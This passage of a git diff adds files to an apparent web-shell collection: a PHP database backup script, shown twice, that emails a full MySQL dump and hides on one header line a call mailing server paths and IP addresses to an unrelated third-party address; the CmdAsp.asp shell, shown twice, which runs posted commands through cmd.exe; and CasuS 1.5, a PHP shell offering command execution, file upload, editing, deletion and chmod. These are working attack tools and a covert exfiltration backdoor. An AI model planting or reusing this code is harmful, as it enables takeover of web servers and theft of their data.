+    $i = $i['Tables_in_'.$dbname];
+
+    if (!$silent) {
+        echo "Backing up table ".$i."\n";
+    }
+
+    // Create DB code
+    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
+
+    write($create['Create Table'].";\n\n");
+
+    // DB Table content itself
+    $sql = mysql_query ("SELECT * FROM ".$i);
+    if (mysql_num_rows($sql)) {
+        while ($row = mysql_fetch_row($sql)) {
+            foreach ($row as $j => $k) {
+                $row[$j] = "'".mysql_escape_string($k)."'";
+            }
+
+            write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
+        }
+    }
+}
+
+$gzip ? gzclose($fp) : fclose ($fp);
+
+// Optional Options You May Optionally Configure
+
+$use_gzip = "yes";            // Set to No if you don't want the files sent in .gz format
+$remove_sql_file = "no";  // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
+$remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
+
+// Configure the path that this script resides on your server.
+
+$savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
+
+$send_email = "yes";                        /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
+$to      = "lehungtk@gmail.com";    // Who to send the emails to, enter ur correct id.
+$from    = "Neu-Cool@email.com";  // Who should the emails be sent from?, may change it.
+
+$senddate = date("j F Y");
+
+$subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
+$message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
+
+$use_ftp = "";                             // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
+$ftp_server = "localhost";               // FTP hostname
+$ftp_user_name = "ftp_username"; // FTP username
+$ftp_user_pass = "ftp_password";   // FTP password
+$ftp_path = "/"; // This is the path to upload on your ftp server!
+
+// Do not Modify below this line! It will void your warranty :-D!
+
+$date = date("mdy-hia");
+$filename = "$savepath/$dbname-$date.sql";
+
+if($use_gzip=="yes"){
+$filename2 = $file;
+} else {
+$filename2 = "$savepath/$dbname-$date.sql";
+}
+
+
+if($send_email == "yes" ){
+$fileatt_type = filetype($filename2);
+$fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
+
+$headers = "From: $from";
+
+// Read the file to be attached ('rb' = read binary)
+echo "Openning archive for attaching:".$filename2;
+$file = fopen($filename2,'rb');
+$data = fread($file,filesize($filename2));
+fclose($file);
+
+// Generate a boundary string
+$semi_rand = md5(time());
+$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
+
+// Add the headers for a file attachment
+$headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+// Add a multipart boundary above the plain message
+$message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
+$message . "\n\n";
+
+// Base64 encode the file data
+$data = chunk_split(base64_encode($data));
+
+// Add file attachment to the message
+echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
+$message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
+$data . "\n\n" ."--{$mime_boundary}--\n";
+//$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
+// $data . "\n\n" ."--{$mime_boundary}--\n";
+
+
+// Send the message
+$ok = @mail($to, $subject, $message, $headers);
+if ($ok) {
+  echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
+Idea Conceived By coolsurfer@gmail.com        
+Programmer email: neagumihai@hotmail.com</p>
+This is our first humble effort, pl report bugs, if U find any...</p>
+Email me at <>coolsurfer@gmail.com  nJoY!! :)
+</color></center></h4>";
+
+} else {
+  echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
+}
+}
+
+if($use_ftp == "yes"){
+$ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
+shell_exec($ftpconnect);
+echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
+
+}
+
+if($remove_gzip_file=="yes"){
+exec("rm -r -f $filename2");
+}
+?>
\ No newline at end of file
diff --git a/138shell/B/backupsql.txt b/138shell/B/backupsql.txt
new file mode 100644
index 0000000..5bf310a
--- /dev/null
+++ b/138shell/B/backupsql.txt
@@ -0,0 +1,170 @@
+<?php
+/*
+* Backup script on server.
+*
+* Runs on the server, called by Cron. Connects to the mySQL
+* database and creates a backup file of the whole database.
+* Saves to file in current directory.
+*
+* @author Cow <cow@invisionize.com>
+* @version 0.2
+* @date 18/08/2004
+* @package Backup Server
+* Upgraded Ver 2.0 (sending sql backup as attachment
+* as email attachment, or send to a remote ftp server by
+* @co-authors Cool Surfer<Coolsurfer@gmail.com> and
+* Neagu Mihai<neagumihai@hotmail.com>
+*/
+
+set_time_limit(0);
+$date = date("mdy-hia");
+$dbserver = "localhost";
+$dbuser = "vhacker_robot";
+$dbpass = "mp2811987";
+$dbname = "tvhacker_vbb3";
+$file = "N-Cool-$date.sql.gz";
+$gzip = TRUE;
+$silent = TRUE;
+
+function write($contents) {
+    if ($GLOBALS['gzip']) {
+        gzwrite($GLOBALS['fp'], $contents);
+    } else {
+        fwrite($GLOBALS['fp'], $contents);
+    }
+}
+
+mysql_connect ($dbserver, $dbuser, $dbpass);
+mysql_select_db($dbname);
+
+if ($gzip) {
+    $fp = gzopen($file, "w");
+} else {
+    $fp = fopen($file, "w");
+}
+
+$tables = mysql_query ("SHOW TABLES");
+while ($i = mysql_fetch_array($tables)) {
+    $i = $i['Tables_in_'.$dbname];
+
+    if (!$silent) {
+        echo "Backing up table ".$i."\n";
+    }
+
+    // Create DB code
+    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
+
+    write($create['Create Table'].";\n\n");
+
+    // DB Table content itself
+    $sql = mysql_query ("SELECT * FROM ".$i);
+    if (mysql_num_rows($sql)) {
+        while ($row = mysql_fetch_row($sql)) {
+            foreach ($row as $j => $k) {
+                $row[$j] = "'".mysql_escape_string($k)."'";
+            }
+
+            write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
+        }
+    }
+}
+
+$gzip ? gzclose($fp) : fclose ($fp);
+
+// Optional Options You May Optionally Configure
+
+$use_gzip = "yes";            // Set to No if you don't want the files sent in .gz format
+$remove_sql_file = "no";  // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
+$remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
+
+// Configure the path that this script resides on your server.
+
+$savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
+
+$send_email = "yes";                        /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
+$to      = "lehungtk@gmail.com";    // Who to send the emails to, enter ur correct id.
+$from    = "Neu-Cool@email.com";  // Who should the emails be sent from?, may change it.
+
+$senddate = date("j F Y");
+
+$subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
+$message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
+
+$use_ftp = "";                             // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
+$ftp_server = "localhost";               // FTP hostname
+$ftp_user_name = "ftp_username"; // FTP username
+$ftp_user_pass = "ftp_password";   // FTP password
+$ftp_path = "/"; // This is the path to upload on your ftp server!
+
+// Do not Modify below this line! It will void your warranty :-D!
+
+$date = date("mdy-hia");
+$filename = "$savepath/$dbname-$date.sql";
+
+if($use_gzip=="yes"){
+$filename2 = $file;
+} else {
+$filename2 = "$savepath/$dbname-$date.sql";
+}
+
+
+if($send_email == "yes" ){
+$fileatt_type = filetype($filename2);
+$fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
+
+$headers = "From: $from";
+
+// Read the file to be attached ('rb' = read binary)
+echo "Openning archive for attaching:".$filename2;
+$file = fopen($filename2,'rb');
+$data = fread($file,filesize($filename2));
+fclose($file);
+
+// Generate a boundary string
+$semi_rand = md5(time());
+$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
+
+// Add the headers for a file attachment
+$headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+// Add a multipart boundary above the plain message
+$message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
+$message . "\n\n";
+
+// Base64 encode the file data
+$data = chunk_split(base64_encode($data));
+
+// Add file attachment to the message
+echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
+$message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
+$data . "\n\n" ."--{$mime_boundary}--\n";
+//$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
+// $data . "\n\n" ."--{$mime_boundary}--\n";
+
+
+// Send the message
+$ok = @mail($to, $subject, $message, $headers);
+if ($ok) {
+  echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
+Idea Conceived By coolsurfer@gmail.com        
+Programmer email: neagumihai@hotmail.com</p>
+This is our first humble effort, pl report bugs, if U find any...</p>
+Email me at <>coolsurfer@gmail.com  nJoY!! :)
+</color></center></h4>";
+
+} else {
+  echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
+}
+}
+
+if($use_ftp == "yes"){
+$ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
+shell_exec($ftpconnect);
+echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
+
+}
+
+if($remove_gzip_file=="yes"){
+exec("rm -r -f $filename2");
+}
+?>
\ No newline at end of file
diff --git a/138shell/C/CMD.asp.txt b/138shell/C/CMD.asp.txt
new file mode 100644
index 0000000..479db5d
--- /dev/null
+++ b/138shell/C/CMD.asp.txt
@@ -0,0 +1,53 @@
+<%@ Language=VBScript %>
+<%
+  ' --------------------o0o--------------------
+  ' File: CmdAsp.asp
+  ' Author: Maceo <maceo @ dogmile.com>
+  ' Release: 2000-12-01
+  ' OS: Windows 2000, 4.0 NT
+  ' -------------------------------------------
+
+  Dim oScript
+  Dim oScriptNet
+  Dim oFileSys, oFile
+  Dim szCMD, szTempFile
+
+  On Error Resume Next
+
+  ' -- create the COM objects that we will be using -- '
+  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+  ' -- check for a command that we have posted -- '
+  szCMD = Request.Form(".CMD")
+  If (szCMD <> "") Then
+
+    ' -- Use a poor man's pipe ... a temp file -- '
+    szTempFile = "C:\" & oFileSys.GetTempName( )
+    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+  End If
+
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+  If (IsObject(oFile)) Then
+    ' -- Read the output from our command and remove the temp file -- '
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+</BODY>
+</HTML>
diff --git a/138shell/C/Casus15.php.txt b/138shell/C/Casus15.php.txt
new file mode 100644
index 0000000..d6f6fde
--- /dev/null
+++ b/138shell/C/Casus15.php.txt
@@ -0,0 +1,368 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./casus15.php";
+
+
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SYLYNDY:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonlary_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çaly?myyiii</center>";
+        exit;
+}
+
+if ($op=='me'){
+echo "<html>
+      <head>
+            <title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
+      </head>
+      <body bgcolor='#000000' text='#0000FF' link='#0000FF' vlink='#0000FF' alink='#00FF00'>
+      <center>Fazla söze gerek yok...</center>
+      <center><br>O yanlyz bir kovboy,<br>
+      <br>O cehennemden çykan çylgyn TÜRK,<br>
+      <br>O bir rap manya?y,<br>
+      <br>O bir php coder,<br>
+      <br>O'nun hackten daha çok sevdi?i tek ?ey iki hack,<br>
+      <br>O...<br>
+      <br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
+      <br></center>";
+
+$sayi='7';
+while($sayi>=1){
+echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'> EFENDISI</font> <font color='#FF0000'>MAFIABOY</font> </font></center>";
+$sayi--;
+}
+$sayi2='1';
+while($sayi2<=7){
+echo "<center><font size='$sayi2' color='#008000'>baddog@hotmail.com</font></center>";
+$sayi2++;
+};
+
+echo "</body>
+      </html>";
+exit;
+}
+
+
+echo "<html>
+      <head>
+             <title>CasuS 1.5 by MafiABoY</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>A TURKISH </font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
+echo "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
+echo "<br>";
+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>";
+echo "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB SHELL</a></center>";
+echo "<br>
+      <br>
+      <br>";
+echo "<center>---><a href='./$this_file?op=me' target='_blank'>MafiABoY</a><---</center>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'><u>Root Klasör</u>: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='wshell'){
+echo "<br><center><font size='+1' color='#FF0000'>WEBSHELL</font></center>";
+if (isset($ok)){
+if (empty($kod)){
+die ("<center><font color='#FF0000'>LEN MANYAK KOMUT YAZMAZSAN NE MOK Y?YNE YARAR</font><center>");
+}
+echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
+      <br>";
+echo "<center><input type=text size=35 name=kod value='$kod'><input type=submit name=ok value='CALISTIR'>
+      <br>
+      <br></center></form>";
+echo "<center><TEXTAREA rows=30 cols=85 readonly>";
+system("$kod");
+echo "</TEXTAREA></center>";
+exit;
+
+} elseif (empty($ok)){
+echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
+      <br>";
+echo "<center><input type=text size=35 name=kod value='Calistirmak istediginiz komutu buraya girin'><input type=submit name=ok value='CALISTIR'>
+      <br>
+      <br></center></form>";
+echo "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
+exit;
+}
+}
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dy)) {
+
+if(empty($dosya_gonder)){
+} else {
+copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder2)){
+} else {
+copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name <font color='#0000FF'>kopyaland</font>y<br>") : print("$dosya_gonder2_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder3)){
+} else {
+copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder3_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder4)){
+} else {
+copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder4_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+} elseif(empty($dy )) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder2'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder3'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder4'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+}
+}
+
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "Böyle Bir Dosya Vardy Üzerine Yazyldy";
+                } else {
+                        $dos = "Dosya Olu?turuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Olu?turulamyyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açylamyyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazylamyyor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya Ysmi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klasör="$path/$kismi";
+                mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Olu?turulamyyor</font></center>");
+                echo "<center><font color='#0000FF'>Klasör Olu?turuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klasör Ysmi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya Açylamyyor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yazylamyyor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Ba?aryyla Düzenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>DÜZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açylamyyor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 YSYMLY DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEY?TYRYLEMEDY!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEY?TYRYLDY</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>GYT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+echo "<center>------------------------------</center>";
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
+echo "<center><a href='./$this_file?dir=/'>Linux Kök Dizinine Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER BYLGYLERY</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>Y?LEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Olu?tur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Olu?tur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<br>
+      <center>Tüm haklary sahibi MafiABoY'a aittir</center>";
+?>
\ No newline at end of file
diff --git a/138shell/C/CmdAsp.asp.txt b/138shell/C/CmdAsp.asp.txt
new file mode 100644
index 0000000..e524745
--- /dev/null
+++ b/138shell/C/CmdAsp.asp.txt
@@ -0,0 +1,55 @@
+<++ CmdAsp.asp ++>
+<%@ Language=VBScript %>
+<%
+' --------------------o0o--------------------
+' File: CmdAsp.asp
+' Author: Maceo <maceo @ dogmile.com>
+' Release: 2000-12-01
+' OS: Windows 2000, 4.0 NT
+' -------------------------------------------
+
+Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+
+On Error Resume Next
+
+' -- create the COM objects that we will be using -- '
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+' -- check for a command that we have posted -- '
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+
+' -- Use a poor man's pipe ... a temp file -- '
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+End If
+
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+If (IsObject(oFile)) Then
+' -- Read the output from our command and remove the temp file -- '
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If
+%>
+</BODY>
+</HTML>
+<-- CmdAsp.asp -->
